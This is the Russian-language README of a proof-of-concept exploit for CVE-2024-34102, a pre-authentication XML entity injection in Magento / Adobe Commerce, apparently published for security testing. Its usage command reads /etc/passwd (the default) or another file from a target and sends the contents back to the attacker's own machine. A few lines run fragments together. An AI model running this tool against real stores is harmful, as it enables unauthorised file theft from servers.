
POC для CVE-2024-34102. Проблема внедрения XML-сущностей до аутентификации в Magento / Adobe Commerce.
POC для CVE-2024-34102. Проблема внедрения XML-сущностей до аутентификации в Magento / Adobe Commerce.

Этот POC попытается прочитать файлы с целевых хостов, уязвимых для недавнего CVE-2024-34102 в Magento / Adobe Commerce. POC основан на этом уведомлении о безопасности и этом исследовании Assetnote.
Для запуска этого POC вам понадобится машина с опубликованным и доступным IP-адресом.
poc.xml, содержащий основные полезные нагрузки./etc/passwd).requestsДля использования этого POC против одной цели:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
Если у вас есть предложения или замечания, свяжитесь со мной.
Этот инструмент предоставлен только в образовательных целях. Я не поощряю, не одобряю и не поддерживаю несанкционированный доступ к каким-либо системам или сетям. Используйте этот инструмент ответственно и только в системах, на тестирование которых у вас есть явное разрешение. Любые действия и последствия, возникшие в результате неправильного использования этого инструмента, являются вашей собственной ответственностью.